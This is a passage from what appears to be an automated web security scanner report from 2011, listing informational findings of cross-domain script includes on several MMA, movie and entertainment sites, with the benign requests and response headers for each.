<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</script>

<script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
...[SNIP]...
<div id="ad_DockingbarExpandable" class="advertisement ">


               <script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;u=%5e%5e;sz=230x25;tile=1;ord=312847891?" type="text/javascript"></script>
...[SNIP]...

       <script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07608"></script>
...[SNIP]...

17.129. http://www.mmafighting.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/feedback/feedback1.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
http://o.aolcdn.com/videoplayer/loader.js
http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js

Request

GET / HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>


<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script src='http://o.aolcdn.com/videoplayer/loader.js'></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

17.130. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/feedback/feedback1.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js
http://www.blogcdn.com/js/ajax_c.js
http://www.weblogsinc.com/b-c/sns.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>


<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.blogcdn.com/js/ajax_c.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.weblogsinc.com/b-c/sns.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</body>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
...[SNIP]...

17.131. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/feedback/feedback1.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js
http://www.blogcdn.com/js/ajax_c.js
http://www.weblogsinc.com/b-c/sns.js

Request

Response

17.132. http://www.mmawarehouse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://mmawarehouse.s3.amazonaws.com/js/scroller.js
http://mmawarehouse.s3.amazonaws.com/js/stscode.js
http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET / HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 65726
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=CBIDGODBKHCLFONNGAPGKJPO; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="homepage_top_row1">
<script type="text/javascript" src="http://mmawarehouse.s3.amazonaws.com/js/stscode.js"></script>
<script type="text/javascript" src="http://mmawarehouse.s3.amazonaws.com/js/scroller.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.133. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70916
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=37411; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=DBIDGODBMBCIKBCOHINKMKNJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.134. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66357
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=30854; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=GBIDGODBMMGIFDGKICDMCOFN; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.135. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66109
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=22942; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=IBIDGODBOHAHGLIENKMIAPLN; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.136. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 65448
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=34079; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=JBIDGODBICLOONOEAHEOGHJJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.137. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66520
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=36372; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=CCIDGODBOBGJFCPIECHDNCDM; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.138. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66593
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=32062; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=PCIDGODBKOKMLDILKMODCCGD; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.139. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmawarehouse.com
Path:	/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/mmawarehouse/js/popup.js
https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70569
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=33949; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=IDIDGODBDNKIGNLKGFIAJFAI; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

17.140. http://www.moviefone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/os/aol/jquery-1.4.3.min.js
http://o.aolcdn.com/videoplayer/loader.js

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
</script> <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery-1.4.3.min.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outblush.com
Path:	/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:

http://outblushcom.skimlinks.com/api/skimlinks.js

Request

Response

17.142. http://www.popeater.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/_media/ke_tools/mmx_refresh_patch.js
http://o.aolcdn.com/art/merge/?f=/popeater/sonar2.js&f=/popeater/cross-promo.js&f=/popeater/popeater.js&f=/us_popeater/profile_ajax.js&f=/us_popeater/profile_main.js&expsec=31536000&ver=1i
http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare-1.2.min.js&ver=4
http://www.aolcdn.com/keyexp/kits/ke_kits.js
http://www.blogsmithmedia.com/www.popeater.com/include/related-links.js
http://www.blogsmithmedia.com/www.popeater.com/include/tabbed-search-header.js?2

Request

GET / HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

